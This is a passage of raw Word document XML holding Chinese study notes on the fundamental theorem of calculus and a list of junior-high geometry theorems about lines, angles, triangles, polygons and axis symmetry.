          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的一个原函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="24" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1038225" cy="209550"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="21" name="图片 21" descr="说明: F'(x)=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descr="说明: F'(x)=f(x)\,"/>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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="685800" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20" name="图片 20" descr="说明: x\in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0" descr="说明: x\in [a,b]"/>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35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="96" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="768"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>那么</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="24" w:line="360" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2076450" cy="400050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19" name="图片 19" descr="说明: \int _{a}^{b}f(x)\,dx=F(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 descr="说明: \int _{a}^{b}f(x)\,dx=F(b)-F(a)\,"/>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076450" cy="400050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>初中几何数学知识点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>线与角</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、两点之间，线段最短。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、经过两点有一条直线，并且只有一条直线。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、等角的补角相等，等角的余角相等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、对顶角相等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、经过直线外或直线上一点，有且只有一条直线与已知直线垂直。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）经过已知直线外一点，有且只有一条直线与已知直线垂直。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）如果两条直线都和第三条直线平行，那么这两条直线也平行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、连接直线外一点与直线上各点的所有线段中，垂线段最短。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、平行线的判定：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="562"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同位角相等，两直线平行；内错角相等，两直线平行；同旁内角互补，两直线平行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、平行线的特征：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="562"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两直线平行，同位角相等；两直线平行，内错角相等；两直线平行，同旁内角互补。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、角平分线的性质：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A1699B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>角平分线上的点到这个角的两边的距离相等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="562"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>角平分线的判定：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A1699B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>到一个角的两边距离相等的点在这个角的平分线上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00A1699B" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、线段垂直平分线的性质：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A1699B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>线段的垂直平分线上的点到这条线段的两个端点的距离相等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00A1699B" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:ind w:left="562"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A1699B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>线段垂直平分线的判定</w:t>
      </w:r>
      <w:r w:rsidRPr="00A1699B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>：到一条线段的两个端点的距离相等的点，在这条线段的垂直平分线上。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="0057606C" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r w:rsidRPr="0057606C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三角形、多边形</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、三角形中的有关公理、定理：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三角形外角的性质：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r w:rsidRPr="006D4925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>三角形的一个外角等于与它不相邻的两个内角的和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；②三角形的一个外角大于任何一个与它不相邻的内角；③三角形的外角和等于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>360</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>°。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）三角形内角和定理：三角形的内角和等于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>180</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>°。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）三角形的任何两边的和大于第三边。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）三角形中位线定理：三角形的中位线平行于第三边，并且等于第三边的一半。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、多边形中的有关公理、定理：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="006D4925" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D4925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="006D4925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="006D4925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>）多边形的内角和定理：</w:t>
      </w:r>
      <w:r w:rsidRPr="006D4925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="006D4925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>边形的内角和等于（</w:t>
      </w:r>
      <w:r w:rsidRPr="006D4925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>n-2</w:t>
      </w:r>
      <w:r w:rsidRPr="006D4925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>）×</w:t>
      </w:r>
      <w:r w:rsidRPr="006D4925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>180</w:t>
      </w:r>
      <w:r w:rsidRPr="006D4925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>°。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="006D4925" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D4925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="006D4925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="006D4925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>）多边形的外角和定理：任意多边形的外角和都为</w:t>
      </w:r>
      <w:r w:rsidRPr="006D4925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>360</w:t>
      </w:r>
      <w:r w:rsidRPr="006D4925">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>°。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、轴对称图形的定义与性质、判定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）若一个图形沿一条直线折叠</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直线两旁的部分能够互相重合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则这个图形就叫做轴对称图形。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）轴对称图形的对称轴是任何一对对应点所连线段的垂直平分线。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
